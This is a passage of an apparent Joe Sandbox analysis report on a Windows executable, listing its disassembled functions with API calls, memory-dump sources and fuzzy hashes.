                                                              • Instruction ID: 584010f172b4cbb649e79453ea2faef52475fdc500b6b1be7d19eacbab0c1be0
                                                              • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                              • Instruction Fuzzy Hash: B431C122E2865386F711EB1588413BD2660AF58BA9F520235DA7DC33F2EFBCE491C710
                                                              Function 00007FF6FB1F52A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                              • Instruction ID: 18c1d2ee62bbe6ac451d10a3cebda90465851a5b82d96694ff170bbc2f223e22
                                                              • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                              • Instruction Fuzzy Hash: EE119621E1D643C1EB60EF51D41017EA6A4BF99B88F444131EA6CD76E6EF3CE551C740
                                                              Function 00007FF6FB205664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                              • Instruction ID: 35c5d3a66de5790085d571a04a69aeacc9efa8447fc38a01dc92675fdc2eda2f
                                                              • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                              • Instruction Fuzzy Hash: 0C218732A18A8386EB658F18D59037976A0EB9CBD4F145234D66DC76F9EF3DD441CB00
                                                              Function 00007FF6FB1EF6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                              • Instruction ID: 4c7fb3b905a1547dee916c8baf13a20a6da47b09726325c44894966dd1d14d2e
                                                              • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                              • Instruction Fuzzy Hash: A601A121E0878340FB04DB56990106DA795EB99FE8F484631DE7C97BE6EE3CE512C300
                                                              Function 00007FF6FB1FC90C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,?,?,00007FF6FB1EFFB0,?,?,?,00007FF6FB1F161A,?,?,?,?,?,00007FF6FB1F2E09), ref: 00007FF6FB1FC94A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                              • Instruction ID: ee4ed4447ee058291ce304c9d2ea37237cb2e6f2edecaf518085abdf680383f6
                                                              • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                              • Instruction Fuzzy Hash: BDF05E00F1824744FF28A66169112791280AF9C7A8F084630D83EC5AE5FE1CE541E210
                                                              Function 00007FF6FB1E81A0 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00007FF6FB1E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6FB1E3FA4,00000000,00007FF6FB1E1925), ref: 00007FF6FB1E86E9
                                                              • LoadLibraryW.KERNEL32(?,00007FF6FB1E5C06,?,00007FF6FB1E308E), ref: 00007FF6FB1E81C2
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ByteCharLibraryLoadMultiWide
                                                              • String ID:
                                                              • API String ID: 2592636585-0
                                                              • Opcode ID: 637d93bcaba6b3ef3808867d80487fbb7a80e425bc13fea3da321eb74d5281f1
                                                              • Instruction ID: e76e410ebf022b6ee35c45f00f2d646ad2c50ac7ac6e1535067692bfbd67e616
                                                              • Opcode Fuzzy Hash: 637d93bcaba6b3ef3808867d80487fbb7a80e425bc13fea3da321eb74d5281f1
                                                              • Instruction Fuzzy Hash: CED0C201F2824281FF54EB77BA4A67991519FCDBC4F489034EE2D83BA6ED3CD0904B00
                                                              Function 00007FFDFB397CD0 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1991624093.00007FFDFB381000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFB380000, based on PE: true
                                                              • Associated: 00000001.00000002.1991585735.00007FFDFB380000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB3F3000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB3F5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB418000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB423000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991624093.00007FFDFB42D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1992057570.00007FFDFB430000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1992103361.00007FFDFB432000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb380000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID:
                                                              • API String ID: 1452528299-0
                                                              • Opcode ID: 561ed47e4d8abebcff930b8a0bcfa96a69a681b153cc9fc109ff1209d6cf9792
                                                              • Instruction ID: e5d9ef02313b0711b454d0e5b342ba67b994b15040497920916b2e47789d19eb
                                                              • Opcode Fuzzy Hash: 561ed47e4d8abebcff930b8a0bcfa96a69a681b153cc9fc109ff1209d6cf9792
                                                              • Instruction Fuzzy Hash: CA219C32708B8187D758DB26E5916A9B7A1FB88BD4F048135EF9C43BA8CF78E455CB00

                                                              Non-executed Functions

                                                              Function 00007FFDFB00266C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 168COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentVariable$ByteCharMultiWide
                                                              • String ID: .rnd$HOME$RANDFILE$SYSTEMROOT$USERPROFILE
                                                              • API String ID: 2184640988-1666712896
                                                              • Opcode ID: 45285921c275070c670ca49d0546862358ccffd5776fb92ec22702d428bfbd5c
                                                              • Instruction ID: dcd142ef93a253c298bd642b41b2ad13806f2eb42f8780c7f2664cde0eb5f9c5
                                                              • Opcode Fuzzy Hash: 45285921c275070c670ca49d0546862358ccffd5776fb92ec22702d428bfbd5c
                                                              • Instruction Fuzzy Hash: 7661C763B0AB8396EB509F2594605BA67D1FB45BA8B488231DE7D43BE9DF3DE015C300
                                                              Function 00007FFDFAEE30D8 Relevance: 13.6, APIs: 9, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989811289.00007FFDFAEE1000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989771802.00007FFDFAEE0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAF44000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAF93000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAFEC000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAFF1000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989811289.00007FFDFAFF4000.00000040.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990150988.00007FFDFAFF5000.00000080.00000001.01000000.00000013.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990196980.00007FFDFAFF7000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfaee0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: 00007E126ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 2506844470-0
                                                              • Opcode ID: 999bb984f8f29d299515eb2d0d585a0be66a480aa78c7c7c6d5fea20d2ea7ad2
                                                              • Instruction ID: d160ac30d08e08bfc95e2f924ba23aab425a25b07efe6c438cd242a16fd2691c
                                                              • Opcode Fuzzy Hash: 999bb984f8f29d299515eb2d0d585a0be66a480aa78c7c7c6d5fea20d2ea7ad2
                                                              • Instruction Fuzzy Hash: 1A316172708B8185EB649F60E8A07ED7360FB94744F454479DA5E47A98DF39DA48C700
                                                              Function 00007FF6FB1E79B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7A1B
                                                              • RemoveDirectoryW.KERNEL32(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7A9E
                                                              • DeleteFileW.KERNEL32(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7ABD
                                                              • FindNextFileW.KERNEL32(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7ACB
                                                              • FindClose.KERNEL32(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7ADC
                                                              • RemoveDirectoryW.KERNEL32(?,00007FF6FB1E7EF9,00007FF6FB1E39E6), ref: 00007FF6FB1E7AE5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                              • String ID: %s\*
                                                              • API String ID: 1057558799-766152087
                                                              • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                              • Instruction ID: 260a6123e6ccdfeceeadb3a5763812eba8f680ded8de13b99b7dd316981b334c
                                                              • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                              • Instruction Fuzzy Hash: 35411021E0C54395FB30DB24E5585BD6361FB9C798F480632D57EC2AE4EF6CE64A8740
                                                              Function 00007FFDFB003229 Relevance: 12.3, APIs: 8, Instructions: 251fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$FileFind$00007ErrorF020FirstLastNext
                                                              • String ID:
                                                              • API String ID: 1171239525-0
                                                              • Opcode ID: 93d5875e5dee341f10784224bd53556331c46b81fbb66407b9d17040cc771b2d
                                                              • Instruction ID: 2c40ea2c36e01c741ebcea5e0312f1aff440a75879e1a59bc8cf4e9b9ff86d20
                                                              • Opcode Fuzzy Hash: 93d5875e5dee341f10784224bd53556331c46b81fbb66407b9d17040cc771b2d
                                                              • Instruction Fuzzy Hash: 1AB1A423F0AA8386EB109F25D464A7D67A8FF45BA8F444235DA6D477E8EF3CE1518300
                                                              Function 00007FFDFB005A1F Relevance: 10.6, APIs: 7, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 544d81e5d0bf66c33f804bb133da19342079062bac93336a06aa1597cb30c435
                                                              • Instruction ID: 2e4fd86364cb03323cfb82442812136ac33dd4d4e8997290c00d37e1e33af4e1
                                                              • Opcode Fuzzy Hash: 544d81e5d0bf66c33f804bb133da19342079062bac93336a06aa1597cb30c435
                                                              • Instruction Fuzzy Hash: 33313072709A82C6EB609F60E8507ED73A0FB85744F44403ADA9E47AE9DF38D648C710
                                                              Function 00007FF6FB1EC44C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                              • Instruction ID: 5407e1aa73fb103a69951b37a3210641d96a59a2e985b166c36ad19798042dac
                                                              • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                              • Instruction Fuzzy Hash: 02315276A08B8289EB60CF64E8543FE7364FB48748F445039DA5E87BA5EF38D548C710
                                                              Function 00007FF6FB204F10 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB204F55
                                                                • Part of subcall function 00007FF6FB2048A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB2048BC
                                                                • Part of subcall function 00007FF6FB1F9C58: HeapFree.KERNEL32(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C6E
                                                                • Part of subcall function 00007FF6FB1F9C58: GetLastError.KERNEL32(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C78
                                                                • Part of subcall function 00007FF6FB1F9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6FB1F9BEF,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1F9C19
                                                                • Part of subcall function 00007FF6FB1F9C10: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6FB1F9BEF,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1F9C3E
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB204F44
                                                                • Part of subcall function 00007FF6FB204908: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB20491C
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051BA
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051CB
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB2051DC
                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6FB20541C), ref: 00007FF6FB205203
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
